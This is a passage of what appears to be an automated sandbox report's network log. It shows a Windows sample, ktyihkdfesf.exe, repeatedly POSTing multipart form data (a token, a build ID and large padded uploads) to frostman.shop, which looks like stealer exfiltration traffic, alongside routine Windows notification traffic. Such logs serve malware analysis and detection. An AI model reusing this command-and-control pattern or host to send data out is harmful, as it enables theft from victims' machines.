                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:31 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                32192.168.2.649823116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:31 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----T2DB1DBIMOZU3EU3O890
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 493
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:31 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------T2DB1DBIMOZU3EU3O890Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:32 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                33192.168.2.64984120.198.119.143443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:36 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6a 57 53 6c 6d 69 53 6e 4d 55 2b 78 42 6e 31 51 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 36 31 36 62 66 66 65 32 66 37 63 63 34 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: jWSlmiSnMU+xBn1Q.1Context: 84b616bffe2f7cc4
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:36 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:36 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6a 57 53 6c 6d 69 53 6e 4d 55 2b 78 42 6e 31 51 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 36 31 36 62 66 66 65 32 66 37 63 63 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: jWSlmiSnMU+xBn1Q.2Context: 84b616bffe2f7cc4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:36 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6a 57 53 6c 6d 69 53 6e 4d 55 2b 78 42 6e 31 51 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 36 31 36 62 66 66 65 32 66 37 63 63 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: jWSlmiSnMU+xBn1Q.3Context: 84b616bffe2f7cc4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:37 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:37 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4a 52 73 6a 62 74 6a 44 6e 6b 32 31 35 51 66 42 62 38 6b 30 51 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: JRsjbtjDnk215QfBb8k0QA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                34192.168.2.649854116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:37 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLX
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 3165
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:37 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------UAS0ZU3EUA1NYMY58GLXCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:38 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                35192.168.2.649865116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----XLFCJM79RI58YMYUAAS2
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 207993
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------XLFCJM79RI58YMYUAAS2Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------XLFCJM79RI58YMYUAAS2Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------XLFCJM79RI58YMYUAAS2Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
